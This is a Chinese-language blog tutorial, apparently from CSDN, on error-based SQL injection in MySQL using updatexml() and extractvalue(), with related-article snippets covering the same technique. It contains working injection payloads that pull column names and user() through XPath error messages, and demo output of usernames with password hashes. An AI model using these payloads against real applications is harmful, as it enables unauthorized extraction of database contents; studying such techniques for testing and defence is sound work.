Xpath报错注入(extractvalue和updatexml)

最新推荐文章于 2024-06-05 09:47:09 发布
最新推荐文章于 2024-06-05 09:47:09 发布
阅读量1.2k 收藏 17
点赞数 3
分类专栏: 渗透 文章标签: sql 数据库 php 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39034533/article/details/123732358
版权

updatexml() 函数报错注入原理

  • updatexml() 函数定义

UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称;
第二个参数:XPath_string (Xpath格式的字符串);
第三个参数:new_value,String格式,替换查找到的符合条件的数据;

  • updatexml() 函数运行机制

该函数对XPath_string进行查询操作,如果符合语法格式要求,则用第三个参数替换,不符合语法格式要求,则会报错并带出查询的结果

  • 报错执行

 SELECT updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);
结果:
ERROR 1105 (HY000): XPATH syntax error: '~8.0.12~'
其中 0x7e 为十六进制字符 ~用于分隔字符串

payload:

and updatexml(1,concat((SELECT group_concat(0x7e,column_name) from users)),1);

🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨华丽分割线🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨

关于concat()与group_concat()的用法与区别

concat和group_concat都是用在sql语句中做拼接使用的,但是两者使用的方式不尽相同,concat是针对以行数据做的拼接,而group_concat是针对列做的数据拼接,且group_concat自动生成逗号

concat():

 select CONCAT(username,0x7e,password) from users;
结果:
+----------------------------------------+
| CONCAT(username,0x7e,password)         |
+----------------------------------------+
| admin~e10adc3949ba59abbe56e057f20f883e |
| george~afafagafh3427hr5s565s6h565d4fsh |
+----------------------------------------+
2 rows in set (0.00 sec)

group_concat():

 select GROUP_CONCAT(username,0x7e,password) from users;
结果:
+-------------------------------------------------------------------------------+
| GROUP_CONCAT(username,0x7e,password)                                          |
+-------------------------------------------------------------------------------+
| admin~e10adc3949ba59abbe56e057f20f883e,george~afafagafh3427hr5s565s6h565d4fsh |
+-------------------------------------------------------------------------------+
1 row in set (0.00 sec)

concat()有几行数据就输出几行数据

group_concat()将所有数据放在一行,将每组数据用逗号隔开

🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨华丽分割线🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨🤨

extractvalue()函数报错注入原理

  • extractvalue()函数定义

EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称;
第二个参数:XPath_string (Xpath格式的字符串);
作用:从目标XML中返回包含所查询值的字符串;

用法与updatexml相同

payload:

and extractvalue(1,concat((SELECT group_concat(0x7e,column_name) from users)));

石页yks
关注
  • 3
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XPATH报错注入
7hinkSource的博客
08-12 838
extractvalue() extractvalue() :对XML文档进行查询的函数 语法:extractvalue(文档,路径) 路径写入其他格式,就会报错并且会返回我们写入的非法格式内容,我们可以利用这个得到我们想得到的内容 正常查询 第二个参数的位置格式 为 /x/xx ,即使查询不到也不会报错 select username from security.user where id=1 and (extractvalue(‘1’,’/x/xx’)) 使用concat()拼接 ‘ / ‘ 效果
Xpath 报错注入
weixin_73180072的博客
12-04 399
Xpath 报错注入
SQL注入之updatexml报错注入(函数解释)
最新发布
m0_74608722的博客
06-05 424
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法错误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会报错。
xpath报错注入
硫酸超的博客
07-30 1061
xpath报错注入extractvalueupdatexml)知识铺垫updatexml()函数实操extractvalue()函数实操 知识铺垫 在mysql高版本(大于5.1版本)中添加了对XML文档进行查询和修改的函数: updatexml() extractvalue() 当这两个函数在执行时,如果出现xml文档路径错误就会产生报错 updatexml()函数 updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。 作用:改变文档中符合条件的节点的值 语法: updatexm
MYSQL注入之XPATH语法错误报错扩展
cyynid的博客
06-05 751
但是对于此类报错来说,其报错函数并不止上述提供的两个,不同的数据库版本有不同的报错函数,本文提供一个自动化脚本,可以自动化的检测各个版本的Xpath报错函数,其原理非常简单,就是通过爬虫爬取mysql官方文档的函数内容,构造报错输入,进行测试,来实现自动化的报错函数检测。#都处于标签scope="row"之下,并且没有被包裹,因此可以用xpath进行定位,然后使用正则提取出函数名。#都处于标签scope="row"之下,并且没有被包裹,因此可以用xpath进行定位,然后使用正则提取出函数名。
sql注入练习1(XPath报错)
kkzzjx
05-29 620
文章为自我记录,相关原理还是得自己查呀 前置知识xpath XPath 使用路径表达式在 XML 文档中选取节点。节点是通过沿着路径或者 step 来选取的。 下面列出了最有用的路径表达式: 表达式 描述 nodename 选取此节点的所有子节点。 / 从根节点选取。 // 从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置。 . 选取当前节点。 … 选取当前节点的父节点。 @ 选取属性。 实例 在下面的表格中,我们已列出了一些路径表达式以及表达式的结果: .
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
SQL注入 报错(updatexmlextractvalue函数介绍)-01
09-15
今天,我们将讨论SQL注入报错的两种常用函数:updatexmlextractvalue函数。 updatexml函数 updatexml函数是MySQL中的一个XML函数,用于更新XML文档中的数据。其语法为: ``` UPDATEXML(XML_document, XPath_...
7. updatexml()报错注入 示例1
08-03
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串)
dom4j 和xpath
12-05
DOM4J和XPathXML处理领域中的两个重要概念,它们在Java编程中有着广泛的应用。DOM4J是一款灵活且功能强大的Java库,主要用于处理XML文档,而XPath是一种在XML文档中查找信息的语言。 DOM4J简介: DOM4J是基于Java...
XPath注入漏洞利用工具XPath-XCat.zip
07-19
XCat是一个命令行程序,用于辅助XPath注入漏洞的利用。XCat使用Python编写并开放源代码。XCat正常使用需要python的SimpleXMLWriter模块。 标签:XPath
sql注入之报错注入
热门推荐
silence1_的博客
06-04 3万+
报错注入 报错注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这里主要记录一下xpath语法错误和concat+rand()+group_by()导致主键重复 xpath语法错误 利用xpath语法错误来进行报错注入主要利用extractvalueupdatexml两个函数。 使用...
xpath注入详解(三)
Endeavour的博客
06-25 486
一、xpath实列分析(实例1) 主流脚本语言都支持对XPath的处理,本次实例分析以PHP来学习XPath注入的原理; blog.xml: <?xml version="1.0" encoding="UTF-8"?> <root> <users> <user> <id>1<...
mysql漏洞函数xpath_XPATH注入
weixin_30185907的博客
01-28 661
前言在网上看到了一个XPATH注入,发现自己确实有的地方没见过。。就拿来学习了一下链接:XPATHXPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。XPath 基于 XML 的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在 XML 文档中对元素...
Xpath 语法(http://www.w3school.com.cn/xpath/xpath_syntax.asp)
weixin_30379911的博客
07-21 161
XPath 使用路径表达式来选取 XML 文档中的节点或节点集。节点是通过沿着路径 (path) 或者步 (steps) 来选取的。 XML 实例文档 我们将在下面的例子中使用这个 XML 文档。 <?xml version="1.0" encoding="ISO-8859-1"?> <bookstore> <book> &l...
Xpath 语法
qq_44774031的博客
06-01 183
Ant-Design-Pro(Ubuntu16) 1.配置基本环境 1. 安装nodejs (最新版本) 2. 查看node版本 node -v 3.安装n 程序 npm i -g n --force 4 安装最新的node n stable 2.安装ant-design-pro
XPath Syntax
11-16 282
XPath Syntax XPath uses path expressions to select nodes or node-sets in an XML document. The node is selected by following a path or steps.The XML Example DocumentWe will use the followi
Xpath注入攻击及其防御技术研究
weixin_34273046的博客
02-02 501
Xpath注入攻击及其防御技术研究 陆培军 (南通大学 计算机科学与技术学院,江苏 南通226019)     摘 要 XML技术被广泛使用,XML数据的安全性越来越重要。本文简要介绍了XPath注入攻击XML数据的原理。在前人提出的防御通用方法的基础上,提出一个XPath 注入攻击通用检验模型,模型具有普遍意义。     关键词 XPath注入攻击; 防御技术; 模型 ...
mysql报错注入updatexml原理
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml(target_xml, xpath_expr, new_value) ``` 其中,target_xml 是待修改的 XML 数据,xpath_expr 是 XPath 表达式,new_value 是新的值。 在进行 SQL 注入攻击时,攻击者可以构造恶意的 xpath_expr 参数,使得 MySQL 数据库返回错误的信息,从而获取敏感信息。 具体实现方法可以参考以下示例: ``` SELECT updatexml(null,concat(0x7e,(SELECT user()),0x7e),null); ``` 在这个例子中,攻击者使用 concat 函数将波浪符号(0x7e)和当前用户的信息拼接成字符串,并作为 xpath_expr 参数传递给 updatexml 函数。由于这个参数不合法,MySQL 数据库会返回错误信息,其中包含了当前用户的信息。攻击者就可以从错误信息中获取敏感信息。 为了防止这种攻击,应该对用户输入进行严格的过滤和验证,避免恶意的输入。同时,也可以通过限制 MySQL 用户的权限来降低攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值